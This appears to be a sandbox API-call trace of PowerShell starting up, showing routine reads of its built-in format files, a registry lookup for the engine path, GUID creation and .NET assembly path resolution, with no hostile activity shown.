	[0476.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0476.623] SetErrorMode (uMode=0x1) returned 0x1
	[0476.623] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d820 | out: lpFileInformation=0x22d820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0476.623] SetErrorMode (uMode=0x1) returned 0x1
	[0476.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0476.624] SetErrorMode (uMode=0x1) returned 0x1
	[0476.624] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d820 | out: lpFileInformation=0x22d820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0476.624] SetErrorMode (uMode=0x1) returned 0x1
	[0476.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0476.624] SetErrorMode (uMode=0x1) returned 0x1
	[0476.624] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d820 | out: lpFileInformation=0x22d820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0476.624] SetErrorMode (uMode=0x1) returned 0x1
	[0476.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0476.624] SetErrorMode (uMode=0x1) returned 0x1
	[0476.625] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d820 | out: lpFileInformation=0x22d820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0476.625] SetErrorMode (uMode=0x1) returned 0x1
	[0476.626] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0476.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0476.626] CoTaskMemFree (pv=0x1b39cff0) 
	[0476.631] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0476.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0476.631] CoTaskMemFree (pv=0x1b39cff0) 
	[0476.631] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0476.631] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0476.631] CoTaskMemFree (pv=0x1b39cff0) 
	[0476.632] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0476.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0476.632] CoTaskMemFree (pv=0x1b39cff0) 
	[0476.632] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0476.632] GetFileType (hFile=0x30c) returned 0x1
	[0476.632] SetErrorMode (uMode=0x1) returned 0x1
	[0476.632] GetFileType (hFile=0x30c) returned 0x1
	[0476.633] ReadFile (in: hFile=0x30c, lpBuffer=0x323da28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x323da28*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.634] ReadFile (in: hFile=0x30c, lpBuffer=0x323da28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x323da28*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.634] ReadFile (in: hFile=0x30c, lpBuffer=0x323da28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x323da28*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.634] ReadFile (in: hFile=0x30c, lpBuffer=0x323da28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x323da28*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.635] ReadFile (in: hFile=0x30c, lpBuffer=0x323da28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x323da28*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.635] ReadFile (in: hFile=0x30c, lpBuffer=0x323da28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x323da28*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0476.635] ReadFile (in: hFile=0x30c, lpBuffer=0x323da28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x323da28*, lpNumberOfBytesRead=0x22d4b8*=0x9e2, lpOverlapped=0x0) returned 1
	[0476.635] ReadFile (in: hFile=0x30c, lpBuffer=0x323cf72, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x323cf72*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0476.635] ReadFile (in: hFile=0x30c, lpBuffer=0x323da28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x323da28*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0476.635] CloseHandle (hObject=0x30c) returned 1
	[0476.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0476.636] SetErrorMode (uMode=0x1) returned 0x1
	[0476.636] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d460 | out: lpFileInformation=0x22d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0476.636] SetErrorMode (uMode=0x1) returned 0x1
	[0476.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0476.636] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d548 | out: phkResult=0x22d548*=0x30c) returned 0x0
	[0476.636] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d4cc, lpData=0x0, lpcbData=0x22d4c8*=0x0 | out: lpType=0x22d4cc*=0x1, lpData=0x0, lpcbData=0x22d4c8*=0x56) returned 0x0
	[0476.636] CoTaskMemAlloc (cb=0x5a) returned 0x1b3a6b80
	[0476.636] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d49c, lpData=0x1b3a6b80, lpcbData=0x22d498*=0x56 | out: lpType=0x22d49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d498*=0x56) returned 0x0
	[0476.636] CoTaskMemFree (pv=0x1b3a6b80) 
	[0476.636] RegCloseKey (hKey=0x30c) returned 0x0
	[0476.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0476.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0476.645] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x229d336f, Data2=0x606, Data3=0x40be, Data4=([0]=0x85, [1]=0x3, [2]=0x4c, [3]=0x30, [4]=0xda, [5]=0xb, [6]=0x6, [7]=0x6e))) returned 0x0
	[0477.280] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x648bf21b, Data2=0x9430, Data3=0x41ac, Data4=([0]=0x9c, [1]=0xdd, [2]=0x97, [3]=0xc8, [4]=0x2e, [5]=0x14, [6]=0x76, [7]=0x2f))) returned 0x0
	[0477.282] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0477.282] GetFileType (hFile=0x30c) returned 0x1
	[0477.282] SetErrorMode (uMode=0x1) returned 0x1
	[0477.282] GetFileType (hFile=0x30c) returned 0x1
	[0477.282] ReadFile (in: hFile=0x30c, lpBuffer=0x3268590, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3268590*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.283] ReadFile (in: hFile=0x30c, lpBuffer=0x3268590, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3268590*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.283] ReadFile (in: hFile=0x30c, lpBuffer=0x3268590, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3268590*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.284] ReadFile (in: hFile=0x30c, lpBuffer=0x3268590, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3268590*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.284] ReadFile (in: hFile=0x30c, lpBuffer=0x3268590, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3268590*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.285] ReadFile (in: hFile=0x30c, lpBuffer=0x3268590, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3268590*, lpNumberOfBytesRead=0x22d4b8*=0xfb2, lpOverlapped=0x0) returned 1
	[0477.285] ReadFile (in: hFile=0x30c, lpBuffer=0x3267caa, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3267caa*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0477.285] ReadFile (in: hFile=0x30c, lpBuffer=0x3268590, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x3268590*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0477.285] CloseHandle (hObject=0x30c) returned 1
	[0477.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0477.285] SetErrorMode (uMode=0x1) returned 0x1
	[0477.285] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d460 | out: lpFileInformation=0x22d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0477.285] SetErrorMode (uMode=0x1) returned 0x1
	[0477.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0477.286] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d548 | out: phkResult=0x22d548*=0x30c) returned 0x0
	[0477.286] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d4cc, lpData=0x0, lpcbData=0x22d4c8*=0x0 | out: lpType=0x22d4cc*=0x1, lpData=0x0, lpcbData=0x22d4c8*=0x56) returned 0x0
	[0477.286] CoTaskMemAlloc (cb=0x5a) returned 0x1b3a6b80
	[0477.286] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d49c, lpData=0x1b3a6b80, lpcbData=0x22d498*=0x56 | out: lpType=0x22d49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d498*=0x56) returned 0x0
	[0477.286] CoTaskMemFree (pv=0x1b3a6b80) 
	[0477.286] RegCloseKey (hKey=0x30c) returned 0x0
	[0477.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0477.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0477.288] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xaa08c802, Data2=0xfd1d, Data3=0x46eb, Data4=([0]=0xaf, [1]=0x96, [2]=0xf9, [3]=0xe1, [4]=0x4c, [5]=0x93, [6]=0xff, [7]=0xd))) returned 0x0
	[0477.290] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x6293c950, Data2=0xf24e, Data3=0x4606, Data4=([0]=0xb6, [1]=0x27, [2]=0x23, [3]=0xf, [4]=0x3c, [5]=0xe3, [6]=0xec, [7]=0x57))) returned 0x0
	[0477.290] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x4cc1ba1b, Data2=0x3871, Data3=0x4f5e, Data4=([0]=0x98, [1]=0x69, [2]=0x49, [3]=0xc7, [4]=0x27, [5]=0xe7, [6]=0xac, [7]=0x9))) returned 0x0
	[0477.290] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xb757dc8f, Data2=0x9407, Data3=0x4424, Data4=([0]=0xa1, [1]=0x4e, [2]=0xb7, [3]=0x6c, [4]=0xaf, [5]=0x83, [6]=0x93, [7]=0x27))) returned 0x0
	[0477.290] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0xdf48673b, Data2=0x2f63, Data3=0x41b9, Data4=([0]=0x97, [1]=0xe8, [2]=0xf7, [3]=0x31, [4]=0x11, [5]=0x6f, [6]=0x0, [7]=0x30))) returned 0x0
	[0477.291] CoCreateGuid (in: pguid=0x22d770 | out: pguid=0x22d770*(Data1=0x26c32eff, Data2=0xde57, Data3=0x49aa, Data4=([0]=0x9c, [1]=0xc9, [2]=0x30, [3]=0xd2, [4]=0xb1, [5]=0x12, [6]=0x2b, [7]=0x28))) returned 0x0
	[0477.291] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0477.291] GetFileType (hFile=0x30c) returned 0x1
	[0477.291] SetErrorMode (uMode=0x1) returned 0x1
	[0477.291] GetFileType (hFile=0x30c) returned 0x1
	[0477.291] ReadFile (in: hFile=0x30c, lpBuffer=0x32b42f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x32b42f0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.293] ReadFile (in: hFile=0x30c, lpBuffer=0x32b42f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x32b42f0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.293] ReadFile (in: hFile=0x30c, lpBuffer=0x32b42f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x32b42f0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.293] ReadFile (in: hFile=0x30c, lpBuffer=0x32b42f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x32b42f0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.294] ReadFile (in: hFile=0x30c, lpBuffer=0x32b42f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x32b42f0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.294] ReadFile (in: hFile=0x30c, lpBuffer=0x32b42f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x32b42f0*, lpNumberOfBytesRead=0x22d4b8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.294] ReadFile (in: hFile=0x30c, lpBuffer=0x32b42f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x32b42f0*, lpNumberOfBytesRead=0x22d4b8*=0xaca, lpOverlapped=0x0) returned 1
	[0477.295] ReadFile (in: hFile=0x30c, lpBuffer=0x32b3922, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x32b3922*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0477.295] ReadFile (in: hFile=0x30c, lpBuffer=0x32b42f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d4b8, lpOverlapped=0x0 | out: lpBuffer=0x32b42f0*, lpNumberOfBytesRead=0x22d4b8*=0x0, lpOverlapped=0x0) returned 1
	[0477.295] CloseHandle (hObject=0x30c) returned 1
	[0477.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0477.295] SetErrorMode (uMode=0x1) returned 0x1
	[0477.295] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d460 | out: lpFileInformation=0x22d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0477.295] SetErrorMode (uMode=0x1) returned 0x1
	[0477.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0477.296] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d548 | out: phkResult=0x22d548*=0x30c) returned 0x0
	[0477.296] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d4cc, lpData=0x0, lpcbData=0x22d4c8*=0x0 | out: lpType=0x22d4cc*=0x1, lpData=0x0, lpcbData=0x22d4c8*=0x56) returned 0x0
	[0477.296] CoTaskMemAlloc (cb=0x5a) returned 0x1b3a6b80
	[0477.296] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d49c, lpData=0x1b3a6b80, lpcbData=0x22d498*=0x56 | out: lpType=0x22d49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d498*=0x56) returned 0x0
	[0477.296] CoTaskMemFree (pv=0x1b3a6b80) 
	[0477.296] RegCloseKey (hKey=0x30c) returned 0x0
	[0477.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0477.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0477.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x22c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0477.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x22c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0477.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0477.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x22c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
